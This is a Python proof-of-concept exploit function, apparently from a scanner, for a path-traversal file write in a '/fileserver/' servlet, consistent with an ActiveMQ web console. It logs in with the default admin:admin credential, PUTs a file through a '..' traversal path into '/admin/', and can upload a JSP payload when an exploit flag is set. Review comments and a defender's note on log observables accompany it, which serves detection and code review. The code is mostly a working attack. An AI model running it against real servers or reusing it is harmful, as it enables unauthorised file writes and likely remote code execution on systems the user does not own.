def poc(base):
    """Probe one host for a path-traversal file write via the ``/fileserver/`` servlet.

    Sends an authenticated PUT whose path walks out of ``/fileserver/`` into
    ``/admin/``, then GETs the ``/admin/<name>.jsp`` URL that the write would
    have created. Returns that URL when the write is confirmed, ``False``
    otherwise (including on any network or HTTP error).

    Defender's view: the observable in web-server or proxy logs is an HTTP
    PUT to ``/fileserver/`` with ``..`` segments (mixed ``/`` and ``\\``
    separators) in the path, carrying ``Authorization: Basic`` built from
    the default ``admin:admin`` credential, immediately followed by a GET
    under ``/admin/``. A server that rejects traversal in the PUT path or
    no longer accepts the default credential makes this check return
    ``False``. The paths are consistent with an ActiveMQ web console, but
    the product is not named on this page -- confirm against the caller.

    Args:
        base: host, ``host:port`` or full URL; ``http://`` is prepended when
            no scheme is present, and a trailing ``/`` is stripped.

    Returns:
        The ``/admin/<name>.jsp`` URL as ``str`` on success, else ``False``.
    """
    # Accept bare hosts as well as full URLs; only the presence of '://' is checked,
    # so a value like "https://host" is passed through unchanged.
    base = "http://" + base if '://' not in base else base
    # randomString is defined elsewhere in the module; presumably a random
    # 5-character token used as the filename so each probe is distinguishable.
    name = randomString(5)
    # URL the written file is expected to be reachable at afterwards.
    uri = '{url}/admin/{name}.jsp'.format(url=base.rstrip('/'), name=name)
    # Raw string: the traversal uses both '/' and '\' as separators and starts
    # from a non-existent 'sex' directory under /fileserver/.
    target = r'{url}/fileserver/sex../../..\admin/{name}.jsp'.format(url=base.rstrip('/'), name=name)
    # Default credential, base64-encoded for HTTP Basic auth.
    # NOTE(review): b64encode is called on a str, and res2.content is later tested
    # with `in` against a str -- this is Python 2 code; on Python 3 the call
    # raises TypeError before the try block and is not caught.
    key = base64.b64encode("admin:admin")
    # NOTE(review): the literal '}' after %s is part of the header value as sent;
    # the User-Agent is a fixed Firefox 45 string.
    headers = {'Authorization': 'Basic %s}' % key, 'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/45.0'}
    # ENABLE_EXP and JSP_UPLOAD are module-level names defined elsewhere; when
    # ENABLE_EXP is off, a harmless random 10-character body is written instead.
    put_data = JSP_UPLOAD if ENABLE_EXP else randomString(10)
    try:
        # Both requests time out after 10 s; neither follows an explicit verify/proxy setting here.
        res1 = requests.put(target, headers=headers, data=put_data, timeout=10)
        res2 = requests.get(uri, headers=headers, timeout=10)
        # Success criterion: PUT answered 204 and the traversed-to path now serves 200.
        if res1.status_code == 204 and res2.status_code == 200:
            if ENABLE_EXP:
                # With a real payload the body is not compared; the 200 alone is taken as proof.
                return uri
            # Safe mode: only confirmed when the random marker is echoed back in the GET body.
            return uri if put_data in res2.content else False
    except Exception:
        # NOTE(review): this swallows connection errors, timeouts and SSL failures
        # alike, so "unreachable host" and "not vulnerable" are indistinguishable
        # to the caller; at minimum the exception should be logged.
        return False
    # Status codes did not match the success criterion.
    return False